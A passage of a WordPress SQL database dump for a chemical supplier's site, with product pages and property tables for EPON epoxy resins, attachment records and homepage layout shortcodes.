align="center">20.9</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228"></td>\r\n<td valign="top" width="90"></td>\r\n<td valign="top" width="80"></td>\r\n<td valign="top" width="80"></td>\r\n<td valign="top" width="80"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228"><b>Handling Properties @ 25°C</b></td>\r\n<td valign="top" width="90"></td>\r\n<td valign="top" width="80"></td>\r\n<td valign="top" width="80"></td>\r\n<td valign="top" width="80"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228">Gel Time, 100 gram mass</td>\r\n<td valign="top" width="90"></td>\r\n<td valign="top" width="80">\r\n<p align="center">minutes</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">19.6</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">21.3</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228"></td>\r\n<td valign="top" width="90"></td>\r\n<td valign="top" width="80"></td>\r\n<td valign="top" width="80"></td>\r\n<td valign="top" width="80"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228"><b>Cured State Properties</b></td>\r\n<td valign="top" width="90"></td>\r\n<td valign="top" width="80"></td>\r\n<td valign="top" width="80"></td>\r\n<td valign="top" width="80"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228">Heat Distortion Temperature</td>\r\n<td valign="top" width="90">\r\n<p align="center">ASTM D648</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">°C</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">66</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">72</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228">Tensile Strength</td>\r\n<td valign="top" width="90">\r\n<p align="center">ASTM D638</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">psi</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">10,800</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">10,600</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228">Tensile Elongation</td>\r\n<td valign="top" width="90"></td>\r\n<td valign="top" width="80">\r\n<p align="center">%</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">6.5</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">6.0</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228">Tensile Modulus</td>\r\n<td valign="top" width="90"></td>\r\n<td valign="top" width="80">\r\n<p align="center">ksi</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">457</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">473</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228">Hardness</td>\r\n<td valign="top" width="90">\r\n<p align="center">Shore D</p>\r\n</td>\r\n<td valign="top" width="80"></td>\r\n<td valign="top" width="80">\r\n<p align="center">84</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">83</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228">Water Absorption <sup>1</sup></td>\r\n<td valign="top" width="90"></td>\r\n<td valign="top" width="80">\r\n<p align="center">%</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">0.09</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">0.07</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228"></td>\r\n<td valign="top" width="90"></td>\r\n<td valign="top" width="80"></td>\r\n<td valign="top" width="80"></td>\r\n<td valign="top" width="80"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228"><b>Electrical Properties</b></td>\r\n<td valign="top" width="90"></td>\r\n<td valign="top" width="80"></td>\r\n<td valign="top" width="80"></td>\r\n<td valign="top" width="80"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228">Dielectric Constant <sup>2</sup></td>\r\n<td valign="top" width="90">\r\n<p align="center">ASTM D150</p>\r\n</td>\r\n<td valign="top" width="80"></td>\r\n<td valign="top" width="80">\r\n<p align="center">3.82</p>\r\n</td>\r\n<td valign="top" width="80">\r\n<p align="center">3.72</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="228"></td>\r\n<td valign="top" width="90"></td>\r\n<td valign="top" width="80"></td>\r\n<td valign="top" width="80"></td>\r\n<td valign="top" width="80"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<sup>1</sup> Percent weight gain after 24 hours immersion at 25 °C.\r\n\r\n<sup>2</sup> Determined at 1 megacycle\r\n\r\n<strong>Application</strong>\r\n\r\nEPON liquid epoxy resins when properly formulated and cured provide an inert end-product with a unique combination of properties. They are suitable for use in high performance applications such as coatings, adhesives, civil engineering, electronic and electrical insulation, composites and fiber sizing. Cured EPON resins are generally regarded as being high strength materials, since many commonly used systems provide tensile strengths greater than 10,000 psi and modulus values greater than 400,000 psi. One of the most widely recognized applications of cured EPON Resin 815C is strong adhesion to a broad range of substrates. Such systems exhibit shear strength of up to 6,000 psi (41 Mpa). One factor which contributes to this property is the low shrinkage shown by these systems during cure. Compared to other polymers, epoxy resins have low internal stresses resulting in strong and durable finished products.\r\n\r\n<a href="https://www.miller-stephenson.com/tech-support/">Contact Miller-Stephenson Technical Service Department for questions</a>', 'EPON™ 815C', 'EPON Resin 815C is a low viscosity liquid bisphenol A based epoxy resin containing a commercial grade\r\nof n-butyl glycidyl ether. EPON Resin 815C is functionally equivalent to EPON Resin 815, and is suitable as\r\na replacement for EPON Resin 815 in most applications. Benefits include:\r\n<ul>\r\n 	<li>Low viscosity, allows for easy pumping and wetting of pigments and fillers</li>\r\n 	<li>100% reactive. Reacts with a full range of curing agents</li>\r\n 	<li>Provides minimal reduction of performance properties</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-815c', '', '', '2016-11-23 19:25:55', '2016-11-23 19:25:55', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=910', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (911, 3, '2016-08-26 18:06:26', '2016-08-26 18:06:26', '', '815C', '', 'inherit', 'open', 'closed', '', '815c', '', '', '2016-08-26 18:06:26', '2016-08-26 18:06:26', '', 910, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/815C.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (912, 3, '2016-08-26 18:10:00', '2016-08-26 18:10:00', '', 'EPON™ 8132', 'EPON™ Resin 8132 is a 100% reactive low viscosity liquid bisphenol-A based epoxy resin diluted with an Alkyl glycidyl ether. This resin is specially designed for applications requiring low viscosity, minimum odor and good color.\r\n\r\n&nbsp;', 'publish', 'open', 'closed', '', 'epon-8132', '', '', '2016-09-21 14:59:29', '2016-09-21 14:59:29', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=912', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (913, 3, '2016-08-26 18:09:32', '2016-08-26 18:09:32', '', '8132', '', 'inherit', 'open', 'closed', '', '8132', '', '', '2016-08-26 18:09:32', '2016-08-26 18:09:32', '', 912, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/8132.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (917, 3, '2016-08-26 18:28:46', '2016-08-26 18:28:46', '', 'Solid Epoxy solution-EPON', '', 'inherit', 'open', 'closed', '', 'solid-epoxy-solution-epon', '', '', '2016-08-26 18:28:46', '2016-08-26 18:28:46', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Solid-Epoxy-solution-EPON.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (918, 3, '2016-08-26 18:41:52', '2016-08-26 18:41:52', '', 'EPON™ 1001-X-75', 'EPON™ Resin 1001-X-75 is a 75 percent solids solution of an EPON 1001F type epoxy resin in xylene.\r\nSystems based on EPON 1001-X-75 can be formulated to have excellent chemical resistance, corrosion\r\nresistance, and low color. This resin is used in formulating various room temperature curing industrial\r\nmaintenance coatings including clears, primers, masonry surfacers, and gloss and semigloss enamels.', 'publish', 'open', 'closed', '', 'epon-1001-x-75', '', '', '2016-09-23 17:10:36', '2016-09-23 17:10:36', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=918', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (919, 3, '2016-08-26 18:41:24', '2016-08-26 18:41:24', '', '1001-X-75', '', 'inherit', 'open', 'closed', '', '1001-x-75', '', '', '2016-08-26 18:41:24', '2016-08-26 18:41:24', '', 918, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/1001-X-75.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (923, 3, '2016-08-26 18:53:12', '2016-08-26 18:53:12', '', 'EPON Solid Epoxy resins', '', 'inherit', 'open', 'closed', '', 'epon-solid-epoxy-resins', '', '', '2016-08-26 18:53:12', '2016-08-26 18:53:12', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPON-Solid-Epoxy-resins.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (924, 3, '2016-08-26 18:59:56', '2016-08-26 18:59:56', '<p class="Section1">EPON 1001F is a low molecular weight solid epoxy resin derived from a liquid epoxy resin and bisphenol-A. Because of these performance properties, amine and polyamide cured coatings are especially <span class="GramE">useful</span> in maintenance and marine applications.. EPON Resin 1001F is used for its application or end-use advantages in both structural and surface-coating applications as follows:</p>\r\n<p class="Section1"><span style="text-decoration: underline;"><strong>Structural applications</strong></span></p>\r\n<p class="Section1">Because of the excellent pre-impregnation properties, EPON 1001F is used in:</p>\r\n<p class="Section1">• Dry lay-up laminates</p>\r\n<p class="Section1">• Dry filament winding</p>\r\n<p class="Section1">• Transfer molding compounds</p>\r\n<p class="Section1"><span style="text-decoration: underline;"><strong>Surface coatings</strong></span></p>\r\n<p class="Section1">Amine or polyamide cured coatings based on EPON Resin 1001F provide excellent:</p>\r\n<p class="Section1">• Chemical resistance</p>\r\n<p class="Section1">• Durability</p>\r\n<p class="Section1">• Toughness</p>\r\n<p class="Section1">• Adhesion</p>\r\n<p class="Section1"><span style="text-decoration: underline;"><strong>Thermosetting acrylic — EPON Resin systems</strong></span></p>\r\n<p class="Section1">EPON Resin 1001F is used to upgrade thermosetting acrylic resins into coatings with greatly</p>\r\n<p class="Section1"><span class="GramE">improved</span>:</p>\r\n<p class="Section1">• Adhesion</p>\r\n<p class="Section1">• Toughness</p>\r\n<p class="Section1">• Detergent resistance</p>\r\n<p class="Section1">Because of these specific properties, these systems are used extensively for automotive <span class="GramE">and</span> appliance primers. Since solutions of this versatile epoxy resin are the preferred products for most of the aforementioned applications, Miller-Stephenson provides solutions of EPON 1001F in several solvents to assist customers in handling this product.</p>\r\n<p class="Section1"><span style="text-decoration: underline;"><strong>Specifications</strong></span></p>\r\n\r\n<div class="Section1">\r\n<table border="1" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="211">Property</td>\r\n<td valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Weight per Epoxide</td>\r\n<td valign="top" width="72">\r\n<p align="center">g/eq</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">525-550</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1652</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Viscosity at 25°C</td>\r\n<td valign="top" width="72">\r\n<p align="center">cP</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">7.0-9.6</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D445</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Color</td>\r\n<td valign="top" width="72">\r\n<p align="center">Pt-Co</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">200</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1209</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211"></td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132"></td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<p class="Section1"><strong>Typical Properties</strong></p>\r\n\r\n<div class="Section1">\r\n<table border="1" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="211">Property</td>\r\n<td valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Viscosity, Melt, @ 150 °C</td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132">\r\n<p align="center">600-750</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D445-79</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Esterification equivalent weight<sup>1</sup></td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132">\r\n<p align="center">145</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Weight per gallon @ 68 °F</td>\r\n<td valign="top" width="72">\r\n<p align="center">lbs</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">10.2</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Flash Point, Setaflash</td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132">\r\n<p align="center">&gt;200 °F</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D3278</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Bulk density</td>\r\n<td valign="top" width="72">\r\n<p align="center">lbs/ft<sup>3</sup></p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">36-40</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Melting Point</td>\r\n<td valign="top" width="72">\r\n<p align="center">°C</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">75-80</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D3461</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Hydroxyl content</td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132">\r\n<p align="center">0.29</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Calculated value</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Sodium content</td>\r\n<td valign="top" width="72">\r\n<p align="center">ppm</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">0-2</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">HC-692A</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style="text-decoration: underline;"><strong>Identification and Classification</strong></span>\r\n\r\n<strong>Chemical Abstract Service Registry Number:</strong> 25036-25-3 (EPA/TSCA inventory designation)\r\n\r\n<strong>MSDS Number:</strong> 184-04\r\n\r\n<strong>Chemical Designations:</strong>\r\n\r\n• 2.2-<span class="GramE">bis(</span>p-glycidyloxyphenyl) propane condensation product with 2.2-bis(p-hydroxyphenyl)\r\n\r\n<span class="GramE">propane</span> and similar isomers.\r\n\r\n• Phenol. 4.4’-(1-methylethylidene<span class="GramE">)bis</span>-polymer with 2.2’-[(1-methylethylidene)bis-(4.1-\r\n\r\n<span class="GramE">phenyleneoxymethylene</span>)]bis(oxirane).\r\n\r\n<strong>Structural formula, base resin:</strong>\r\n\r\n<img title="EPON 1001F Structure" src="https://www.hexion.com/uploadedImages/Technical_Data_Sheets/Public/Epoxy_Intermediates/EPON%20Resin%201001F%20structure.JPG" alt="EPON 1001F Structure" border="0" />\r\n\r\n&nbsp;\r\n\r\nMiller-Stephenson is an Epon 1001F Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>\r\n\r\n</div>', 'EPON™ 1001F', 'EPON™ Resin 1001F is a low molecular weight solid epoxy resin derived from a liquid epoxy resin and\r\nbisphenol-A. EPON Resin 1001F is used for its application or end-use advantages in both structural and\r\nsurface-coating applications as follows:\r\n<ul>\r\n 	<li><strong>Structural applications</strong>: Excellent pre-impregnation properties</li>\r\n 	<li><strong>Surface coatings</strong>: Toughness, Chemical Resistance, and Durability</li>\r\n 	<li><strong>Thermosetting acrylic</strong>: Adhesion, Toughness, Detergent Resistance</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-1001f', '', '', '2016-11-23 19:24:12', '2016-11-23 19:24:12', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=924', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (925, 3, '2016-08-26 18:58:53', '2016-08-26 18:58:53', '', '1001F', '', 'inherit', 'open', 'closed', '', '1001f', '', '', '2016-08-26 18:58:53', '2016-08-26 18:58:53', '', 924, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/1001F.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (927, 1, '2016-08-26 19:29:23', '2016-08-26 19:29:23', '[quote_request_list]', 'Quote List', '', 'publish', 'closed', 'closed', '', 'quote-list', '', '', '2016-08-26 19:29:23', '2016-08-26 19:29:23', '', 0, 'https://132.148.10.86/wordpress/quote-list/', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (928, 1, '2016-08-26 19:29:23', '2016-08-26 19:29:23', ' ', '', '', 'publish', 'closed', 'closed', '', '928', '', '', '2016-08-26 19:29:23', '2016-08-26 19:29:23', '', 0, 'https://132.148.10.86/wordpress/928/', 4, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (929, 1, '2016-08-26 19:43:06', '2016-08-26 19:43:06', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™<BR>&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS<BR>&amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY<BR>&amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL<BR>CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO<br>RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-26 19:43:06', '2016-08-26 19:43:06', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (930, 1, '2016-08-26 19:43:41', '2016-08-26 19:43:41', '', 'Order &ndash; August 26, 2016 @ 07:43 PM', '', 'wc-request', 'open', 'closed', 'order_57c09bed5e3f0', 'order-aug-26-2016-0743-pm', '', '', '2016-08-26 19:43:41', '2016-08-26 19:43:41', '', 0, 'https://132.148.10.86/wordpress/?post_type=shop_order&p=930', 0, 'shop_order', '', 0); 
INSERT INTO `wp_posts` VALUES (932, 1, '2016-08-27 18:29:53', '2016-08-27 18:29:53', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="chemicals/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™<BR>&amp; LUBRICANTS" link="chemicals/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS<BR>&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY<BR>&amp; CONFORMAL COATINGS" link="chemicals/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL<BR>CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO<br>RADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>Our team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image 